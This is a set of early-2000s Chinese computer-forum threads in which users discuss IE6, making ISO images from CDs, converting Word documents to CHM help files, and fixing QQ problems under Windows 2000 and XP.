bjSun 初级用户 积分：69 发帖：31 来自：中国北京 注册：2001-09-14 | 发表于 2002-01-08 19:18:47 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 收藏该主题供以后查看 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP Word 2000文档如何转换成“帮助”文件，然后嵌套到我的软件中去？ Sun
Bee007 高级用户 积分：193 发帖：223 来自： 注册：2000-02-01 | 发表于 2002-01-08 22:34:29 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent CHM格式电子书制作详解 http://tech.163.com/tm/010606/010606_22518.html [这消息被啸编辑过(编辑时间2002-01-23 02:52:35)]
上一贴 | 下一贴
快速回复 | 主题：Word 2000文档如何转换成“帮助”文件
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


IE6怎么样？好用吗？

计算机技术
IE6怎么样？好用吗？

上一贴 | 下一贴
发表人 主题: IE6怎么样？好用吗？
zy2003

超级用户
积分：376
发帖：143
来自：
注册：2001-10-09
 发表于 2001-12-03 07:22:18 按此观看zy2003的个人资料 按此发邮件给zy2003 收藏该主题供以后查看 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP
比ie5.5如何？

[img]http://51abc.net/banner/banner2.gif[/img]
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-12-03 11:58:13 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
一个字"好"!

^^
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-03 12:11:29 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
目前免装一些补丁~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

nosnowwolfswl

初级用户
积分：0
发帖：1
来自：
注册：2001-12-01
 发表于 2001-12-03 15:30:33 按此观看nosnowwolfswl的个人资料 按此发邮件给nosnowwolfswl nosnowwolfswl 的 oicq 是1679907,查看 1679907 的资料 发送悄悄话给nosnowwolfswl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看nosnowwolfswl的IP
IE6好象还有一个问题，本来在老的IE里地址栏里输入例如china之类的，按Ctrl+Enter会自动加上www.＋.com的，而现在IE6却会加ww.+.co.cn，一个bug吧

神啊！救救我这快要绝种的雪狼吧...
imacwei

终级用户
积分：2243
发帖：1041
来自：China.Jiangs
注册：2001-07-23
 发表于 2001-12-03 17:49:25 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
我个人觉得还是挺不错的！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
色眯眯的小疯狗

| AHO |
积分：4775
发帖：1257
来自：上海
注册：2001-09-23
 发表于 2001-12-03 19:32:50 按此观看色眯眯的小疯狗的个人资料 按此发邮件给色眯眯的小疯狗 色眯眯的小疯狗 的 oicq 是3584852,查看 3584852 的资料 发送悄悄话给色眯眯的小疯狗 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看色眯眯的小疯狗的IP
虽然IE6有很多不成熟的地方

但对于以前的版本来说是一个飞越

| 收藏贴 |
wjack

高级用户
积分：201
发帖：47
来自：上海
注册：2000-10-26
 发表于 2001-12-03 20:51:49 按此观看wjack的个人资料 按此发邮件给wjack 访问wjack的主页 wjack 的 oicq 是393382,查看 393382 的资料 发送悄悄话给wjack 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wjack的IP
绝对不好，启动速度很慢，很容易崩出去！！

网站建设资源站，吐血推荐：
http://www.subdesigner.com
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-03 23:08:44 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
不同意楼上的说法，我认为比5。5要强，界面好看，图片保存方便些~

WINDFLASH
::浅紫色FORUM::
令狐瓜子

9sun
管理员
积分：5449
发帖：1492
来自：南京
注册：2000-07-07
 发表于 2001-12-03 23:26:05 按此观看令狐瓜子的个人资料 按此发邮件给令狐瓜子 令狐瓜子 的 oicq 是15998803,查看 15998803 的资料 发送悄悄话给令狐瓜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看令狐瓜子的IP
虽然关闭了分级审查的功能，可还是会莫名其妙地自动关闭。

独孤八剑

Blueidea Web Team.
Moderator Of Flash Forum

crystal

水晶
积分：2499
发帖：2822
来自：QUAKE
注册：2000-01-30
 发表于 2001-12-04 01:58:05 按此观看crystal的个人资料 该用户不允许显示它的电子邮件 访问crystal的主页 crystal 的 oicq 是1073810,查看 1073810 的资料 发送悄悄话给crystal 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看crystal的IP
ctrl+enter 会出错，中文版的bug，补丁文件要在98下装，2k还不行

书山有路勤为径，学海无涯苦作舟　　Current Project : JSP Nuke
zy2003

超级用户
积分：376
发帖：143
来自：
注册：2001-10-09
 发表于 2001-12-04 07:38:48 按此观看zy2003的个人资料 按此发邮件给zy2003 发送悄悄话给zy2003 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看zy2003的IP
ctr+enter的问题好像可以在注册表改

搜一下.co.cn

[img]http://51abc.net/banner/banner2.gif[/img]
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-12-04 08:49:37 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
试试MSN7.0吧，拿IE6做内核的

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
iMac

深 蓝
积分：2125
发帖：2151
来自：shanghai,Chi
注册：2000-07-18
 发表于 2001-12-04 09:03:05 按此观看iMac的个人资料 按此发邮件给iMac iMac 的 oicq 是2822363,查看 2822363 的资料 发送悄悄话给iMac 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看iMac的IP
天外飞猪在上个帖子中说
引用:
试试MSN7.0吧，拿IE6做内核的

太占资源...

[这消息被iMac编辑过(编辑时间2001-12-04 09:02:37)]

I Love BlueIdea | FIFA2001 | Counter-Strike
仁·者·无·敌 | =SFA= iMac | =BlueIdea= iMac | =-_+= iMac
iMac

深 蓝
积分：2125
发帖：2151
来自：shanghai,Chi
注册：2000-07-18
 发表于 2001-12-04 09:04:14 按此观看iMac的个人资料 按此发邮件给iMac iMac 的 oicq 是2822363,查看 2822363 的资料 发送悄悄话给iMac 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看iMac的IP
nosnowwolfswl在上个帖子中说
引用:
IE6好象还有一个问题，本来在老的IE里地址栏里输入例如china之类的，按Ctrl+Enter会自动加上www.＋.com的，而现在IE6却会加ww.+.co.cn，一个bug吧

我也很莫名阿..

I Love BlueIdea | FIFA2001 | Counter-Strike
仁·者·无·敌 | =SFA= iMac | =BlueIdea= iMac | =-_+= iMac
DayinNightout

超级用户
积分：338
发帖：150
来自：CCF
注册：2000-12-18
 发表于 2001-12-04 09:44:59 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
nosnowwolfswl在上个帖子中说
引用:
IE6好象还有一个问题，本来在老的IE里地址栏里输入例如china之类的，按Ctrl+Enter会自动加上www.＋.com的，而现在IE6却会加ww.+.co.cn，一个bug吧

E 文版的就没有这个 BUG ,要么自己动手修改一下.反正我觉的 IE6.0 比 5.5 好多了

木有签名#@$%
嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-12-04 10:13:50 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
在XP下感觉很爽

缘是天定,份在人为.
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-04 12:17:37 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
天外飞猪在上个帖子中说
引用:
试试MSN7.0吧，拿IE6做内核的

都7，0了？我下了个6。0e文的用了就甩了，只是好看，不爽！~

WINDFLASH
::浅紫色FORUM::
gate

初级用户
积分：22
发帖：25
来自：浙江
注册：2001-10-30
 发表于 2001-12-04 13:30:05 按此观看gate的个人资料 按此发邮件给gate 发送悄悄话给gate 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gate的IP
在98下IE6有BUG，不如在XP下好使。MSN是酷，别的就没什么优点了

享受每一天！
DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2001-12-04 18:06:44 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
Ctrl＋Enter的问题通过一个软件修改dll可以解决，《PCDigest》里有介绍，我用的是英文版，很好用，不怕那些修改注册表的网站，真爽！去下一个英文版的回来用吧，才11M

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

上一贴 | 下一贴
快速回复 | 主题：IE6怎么样？好用吗？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


有什么办法把CD转成ISO等光盘镜像文件吗

计算机技术
有什么办法把CD转成ISO等光盘镜像文件吗

上一贴 | 下一贴
发表人 | 主题: 有什么办法把CD转成ISO等光盘镜像文件吗
poorfish 经典圣僧 现任版主 积分：10941 发帖：3503 来自：江西萍乡 注册：2000-12-04 | 发表于 2001-12-17 18:23:18 按此观看poorfish的个人资料 按此发邮件给poorfish 访问poorfish的主页 poorfish 的 oicq 是1525464,查看 1525464 的资料 收藏该主题供以后查看 发送悄悄话给poorfish 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看poorfish的IP RT 【DW版常见问题解答】【破废墟】 Blueidea Web Team Moderator of DW & JS Forum
flyingbird 想飞的心 积分：4546 发帖：1672 来自： 注册：1999-12-22 | 发表于 2001-12-17 18:25:24 按此观看flyingbird的个人资料 按此发邮件给flyingbird 发送悄悄话给flyingbird 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flyingbird的IP easy CD 或 WinImage 都可以制作iso文件。 行者无疆 Blueidea Web Team Team member
freedog 初级用户 积分：0 发帖：21 来自： 注册：2001-12-14 | 发表于 2001-12-17 18:28:54 按此观看freedog的个人资料 按此发邮件给freedog freedog 的 oicq 是108336337,查看 108336337 的资料 发送悄悄话给freedog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看freedog的IP winiso就能！挺好用的！很多网站都有的下！ I am a freedog！
poorfish 经典圣僧 现任版主 积分：10941 发帖：3503 来自：江西萍乡 注册：2000-12-04 | 发表于 2001-12-17 18:43:49 按此观看poorfish的个人资料 按此发邮件给poorfish 访问poorfish的主页 poorfish 的 oicq 是1525464,查看 1525464 的资料 发送悄悄话给poorfish 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看poorfish的IP winiso試過了,不行的 已經找到一個 http://61.145.113.28/download/swdetail.phtml?id=262 謝謝兩位 【DW版常见问题解答】【破废墟】 Blueidea Web Team Moderator of DW & JS Forum
epie 超级用户 积分：354 发帖：98 来自： 注册：2001-09-14 | 发表于 2002-04-03 13:23:22 按此观看epie的个人资料 按此发邮件给epie epie 的 oicq 是1491135,查看 1491135 的资料 发送悄悄话给epie 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看epie的IP 谢谢楼上诸位，我已成功把CD转成iso文件， 不过不能听啊，2000下我一装DAEMON Tools就死机 在2000下有没有象DAEMON Tools这样的工具 我找周润发！ 这是经典论坛吗？麻烦你帮我找一下周润发！！
jill 终级用户 积分：575 发帖：175 来自：沈阳市 注册：2001-12-10 | 发表于 2002-04-03 22:53:37 按此观看jill的个人资料 按此发邮件给jill jill 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给jill 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jill的IP 用BRFULL 多数盘都行 PS CD PC VCD----- 然后装入DAEMON 几乎万能 什么盘都能用 誓与WIN2000共存
上一贴 | 下一贴
快速回复 | 主题：有什么办法把CD转成ISO等光盘镜像文件吗
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


奇了怪了

计算机技术
奇了怪了

上一贴 | 下一贴
发表人 | 主题: 奇了怪了
Aero-lk 病态天使 现任版主 积分：8862 发帖：4335 来自：appEndiXDesi 注册：2001-03-14 | 发表于 2001-12-21 19:40:35 按此观看Aero-lk的个人资料 按此发邮件给Aero-lk 访问Aero-lk的主页 Aero-lk 的 oicq 是15028519,查看 15028519 的资料 收藏该主题供以后查看 发送悄悄话给Aero-lk 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Aero-lk的IP 我只要一用Ctrl+enter发送qq消息 就会重启 qq版本：2000b 加了个QQ2000 0710B 稳定版IP补丁 操作系统：windows2000 无毒 F-baby,i love u,forever
yuzhiqing 终级用户 积分：682 发帖：417 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-21 20:57:40 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 我以前有过是按键盘一个字母就执行一个程序的情况，这个最好你恢复你的注册表看看，或换个版本 WINDFLASH ::浅紫色FORUM::
alphalee 初级用户 积分：62 发帖：22 来自：北京 注册：2001-12-19 | 发表于 2001-12-21 21:03:34 按此观看alphalee的个人资料 按此发邮件给alphalee 访问alphalee的主页 alphalee 的 oicq 是18776996,查看 18776996 的资料 发送悄悄话给alphalee 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看alphalee的IP 问题出在“稳定版IP补丁”这里。 我的《日记本子》 http://www.diary365.net/book/choose.asp?author=liyue 青春是个普通的名称，它是幸福美好的，但它也充满着艰苦的磨炼！
yuzhiqing 终级用户 积分：682 发帖：417 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-21 21:06:44 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 对，现在有个完美版的 www.qq88.net， WINDFLASH ::浅紫色FORUM::
上一贴 | 下一贴
快速回复 | 主题：奇了怪了
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


WindowsXP 与 QQ2000 ？

计算机技术
WindowsXP 与 QQ2000 ？

上一贴 | 下一贴
发表人 主题: WindowsXP 与 QQ2000 ？
Alien

外星人！
积分：722
发帖：668
来自：地球！
注册：2000-07-26
 发表于 2001-11-16 22:19:39 按此观看Alien的个人资料 按此发邮件给Alien 访问Alien的主页 Alien 的 oicq 是6419759,查看 6419759 的资料 收藏该主题供以后查看 发送悄悄话给Alien 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Alien的IP
为什么我装了 WinXP 后 QQ 的反应慢了好多（老是占着 CPU）？

[ alienhome! | CyberDesigner.org ]
ADSL

终级用户
积分：2969
发帖：668
来自：贫困山区
注册：2001-03-06
 发表于 2001-11-16 22:26:23 按此观看ADSL的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给ADSL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ADSL的IP
装个最新版本的QQ吧

好好学习，努力做事
Alien

外星人！
积分：722
发帖：668
来自：地球！
注册：2000-07-26
 发表于 2001-11-16 22:32:09 按此观看Alien的个人资料 按此发邮件给Alien 访问Alien的主页 Alien 的 oicq 是6419759,查看 6419759 的资料 发送悄悄话给Alien 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Alien的IP
已经是最新的了

[ alienhome! | CyberDesigner.org ]
jorkof

终级用户
积分：1197
发帖：367
来自：北京
注册：2001-06-16
 发表于 2001-11-16 23:29:08 按此观看jorkof的个人资料 按此发邮件给jorkof 访问jorkof的主页 jorkof 的 oicq 是3707274,查看 3707274 的资料 发送悄悄话给jorkof 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jorkof的IP
最新的QQ只是测试版的，过一段时间可能出了正式版就好了

≮曾经沧海难为水jorkof.my163.com除却巫山不是云≯
13RD

无畏的 13 郎
积分：2207
发帖：2967
来自：广州
注册：2000-06-17
 发表于 2001-11-17 02:12:26 按此观看13RD的个人资料 按此发邮件给13RD 访问13RD的主页 13RD 的 oicq 是1428147,查看 1428147 的资料 发送悄悄话给13RD 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看13RD的IP
你的XP什么版本？我以前装2480版本的XP也是这样。用2600CN版本就好了！

我要唱这阙痛快的歌
我要说每句叛逆对白
倾听我呐喊 别当做轻松笑话
我要唱这阙发泄的歌
我要与世界热烈对话
倾听我呐喊
DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2001-11-17 14:11:51 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
13RD在上个帖子中说
引用:
你的XP什么版本？我以前装2480版本的XP也是这样。用2600CN版本就好了！

买到老D了？多少钱？是不是复制文件破解的？还是exe破解的？

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

randomix

小 乱
积分：4642
发帖：1647
来自：亂度謎城
注册：2000-11-30
 发表于 2001-11-17 17:15:34 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP
qq最新的1025版速度就好多了：）
你那个qq是什么版？

always ran...
imacwei

终级用户
积分：2243
发帖：1041
来自：China.Jiangs
注册：2001-07-23
 发表于 2001-11-17 22:48:14 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
反应慢和你的机器有关系吧,你试这把xp中的各种效果关掉，看看是不是好一点！
我现在使用的一切正常！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2001-11-18 12:59:28 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
是版本问题。最新版已解决这个问题。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
Alien

外星人！
积分：722
发帖：668
来自：地球！
注册：2000-07-26
 发表于 2001-11-18 22:22:51 按此观看Alien的个人资料 按此发邮件给Alien 访问Alien的主页 Alien 的 oicq 是6419759,查看 6419759 的资料 发送悄悄话给Alien 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Alien的IP
我的 qq 是 0710 的。
我发现：只要把它禁止隐藏就行了，这样就不会出现那种吃 cpu 的情况了
可是现在用起来不太习惯，555 :~(

[ alienhome! | CyberDesigner.org ]
tntst

高级用户
积分：233
发帖：184
来自：广州
注册：2000-07-23
 发表于 2002-01-12 09:49:08 按此观看tntst的个人资料 按此发邮件给tntst tntst 的 oicq 是10406476,查看 10406476 的资料 发送悄悄话给tntst 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看tntst的IP

  在QQ的快捷方式上右击鼠标－＞属性－＞兼容性－＞选择win98

如下图：

***>> TNTST <<***
-----------------------------------
投稿信箱：tntst@pconline.com.cn
网址： http://www.pconline.com.cn/pcedu
MM MX：[url]http://www.pconline.com.cn/pcedu/redian/mx/[
风梦扬

超级用户
积分：331
发帖：125
来自：广州
注册：2000-10-21
 发表于 2002-01-12 15:37:43 按此观看风梦扬的个人资料 按此发邮件给风梦扬 访问风梦扬的主页 风梦扬 的 oicq 是110681,查看 110681 的资料 发送悄悄话给风梦扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看风梦扬的IP
只需要在 "桌面属性 -- 外观 -- 效果" 下 不要勾选 "拖动时显示窗口内容" 即可.

还有在 "控制面板 -- 系统 -- 系统属性 -- 高级" 性能下的设置 -- 视觉效果 下,不要勾选"拖动时显示窗口内容".

华语互联直播立体台 -- Yuner.com(.cn) 全球华人目标生活多维媒质.

想和NJ们互动么?也欢迎各位一起来参与我们的节目!

进入 "QQ聊天室 -- 网络社团 -- 华语互联网络直播" 一起来互联你我吧.

上一贴 | 下一贴
快速回复 | 主题：WindowsXP 与 QQ2000 ？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


QQ怎么不靠边儿了？

计算机技术
QQ怎么不靠边儿了？

上一贴 | 下一贴
发表人 主题: QQ怎么不靠边儿了？
webhuman

出发
积分：3157
发帖：1513
来自：打死也不说^0^
注册：2000-06-17
 发表于 2001-11-23 12:49:17 按此观看webhuman的个人资料 按此发邮件给webhuman 访问webhuman的主页 webhuman 的 oicq 是1726927,查看 1726927 的资料 收藏该主题供以后查看 发送悄悄话给webhuman 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看webhuman的IP
QQ可以隐藏在浏览器边缘，鼠标触发，会弹出来。我调整了一下显示器画面的形状，怎么就不能隐藏了。怎么调整显示器设置也不行。

无论到了何种境地，都要守住心里头的那一点东西，一个神圣的居于心的正中的原则，既爱生命的意志。
                                                                                ------摩罗
windangel

终级用户
积分：1258
发帖：609
来自：风之国度
注册：2001-02-28
 发表于 2001-11-23 15:06:22 按此观看windangel的个人资料 按此发邮件给windangel 访问windangel的主页 windangel 的 oicq 是870777,查看 870777 的资料 发送悄悄话给windangel 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看windangel的IP
把窗口拖出来，再放进去就好了。

Blueidea Web Team
Moderator Of multimedia forum
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-23 15:16:06 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
QQ的面板的问题~ 面板显示在那边 你改一下分辨率 面板还可能出现杂乱~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

webhuman

出发
积分：3157
发帖：1513
来自：打死也不说^0^
注册：2000-06-17
 发表于 2001-11-23 18:21:11 按此观看webhuman的个人资料 按此发邮件给webhuman 访问webhuman的主页 webhuman 的 oicq 是1726927,查看 1726927 的资料 发送悄悄话给webhuman 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看webhuman的IP
面板拖过来拖过去，就是不能自动隐藏。

更换分辨率也是一样。

天啊！

无论到了何种境地，都要守住心里头的那一点东西，一个神圣的居于心的正中的原则，既爱生命的意志。
                                                                                ------摩罗
caience

冬天是红色
积分：2644
发帖：2438
来自：小城淄博
注册：2000-10-20
 发表于 2001-11-23 18:23:05 按此观看caience的个人资料 按此发邮件给caience 访问caience的主页 发送悄悄话给caience 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看caience的IP
QQ-系统属性-参数设置-windows任务条风格

GUOGUO & MUMU
=NICEMOOD= CS team awper: caience
webhuman

出发
积分：3157
发帖：1513
来自：打死也不说^0^
注册：2000-06-17
 发表于 2001-11-23 18:27:39 按此观看webhuman的个人资料 按此发邮件给webhuman 访问webhuman的主页 webhuman 的 oicq 是1726927,查看 1726927 的资料 发送悄悄话给webhuman 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看webhuman的IP
caience在上个帖子中说
引用:
QQ-系统属性-参数设置-windows任务条风格

哈哈！搞定了。我怎么没有想到这个，我......真是菜啊！

无论到了何种境地，都要守住心里头的那一点东西，一个神圣的居于心的正中的原则，既爱生命的意志。
                                                                                ------摩罗
上一贴 | 下一贴
快速回复 | 主题：QQ怎么不靠边儿了？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


xp下的qq

计算机技术
xp下的qq

上一贴 | 下一贴
发表人 | 主题: xp下的qq
netant 终级用户 积分：587 发帖：517 来自：欠发达地区 注册：2001-05-14 | 发表于 2002-01-14 17:30:25 按此观看netant的个人资料 按此发邮件给netant 访问netant的主页 netant 的 oicq 是64188400,查看 64188400 的资料 收藏该主题供以后查看 发送悄悄话给netant 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看netant的IP 反应好慢好慢啊~~~~~~~~~~~~~~ 怎么解决？ 还有啊,装好的时候让我输入五个帐户,开机的时候叫我选一个帐户登陆,我不想每次都选,想直接进入怎么办？ 还有桌面上为什么没有ie的图标，快捷方式有一个小箭头好难看～～～～～～～～～～ 帮我啊，谢谢各位！ 我发现我上次用的签名档太没有个性了
